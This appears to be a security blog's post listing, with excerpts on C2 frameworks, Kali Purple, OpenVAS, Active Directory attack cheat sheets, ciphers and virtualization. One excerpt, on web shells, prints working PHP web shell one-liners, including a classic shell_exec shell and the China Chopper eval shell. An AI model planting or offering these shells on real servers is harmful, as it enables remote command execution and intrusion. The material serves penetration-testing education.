C2 Frameworks are post-exploitation tools popular among pentesters and threat actors for managing affected hosts from a centralised location. In […]
Kali Purple – Defensive Tools Overview and Cheat Sheet
Kali Linux is a Debian-based Linux distribution originally designed for offensive information security. It contains tons of tools for penetration […]
How to Install Whonix Gateway CLI on Proxmox
Whonix is a privacy-focused operating system that aims to provide users with the highest level of privacy and security possible. […]
Vulnerability Scanner with GVM / OpenVAS
Greenbone Vulnerability Manager, former OpenVAS, is a full-featured free open-source vulnerability scanner with enterprise grade features. It is capable of unauthenticated […]
Web Shell and Web Proxy
WEB SHELLS Classic <?php echo shell_exec($_GET[“cmd”]);?> China Chopper <?php @eval($_POST[‘password’]);?> Web Shell with UI <html><body><form method=”GET” name=”<?php echo basename($_SERVER[‘PHP_SELF’]); ?>”> […]
Affine Cipher Cheat Sheet
Affine Cipher is a relatively simple way for encrypting/decrypting data with low CPU cost but with the expensive of low […]
Active Directory Post-Exploitation Cheat Sheet
After getting the foot in the door in a pentesting scenario or competition it is time for gathering more data […]
Active Directory Exploitation Cheat Sheet
While pentesting a Windows network some tools and essential to have handy: Enum4Linux – Quick enumeration. Kerbrute – Enumerate domain […]
RSA Cheat Sheet
RSA is an asymmetric cryptosystem that used public and private key pairs. Key Terms Encrypt / Decrypt Popular Tools Known […]
Running MacOS in VirtualBox on Linux
This step-by-step will work on VirtualBox 5.x and 6.x for macOS Sierra 10.12, macOS High Sierra 10.13, macOS Catalina 10.15, […]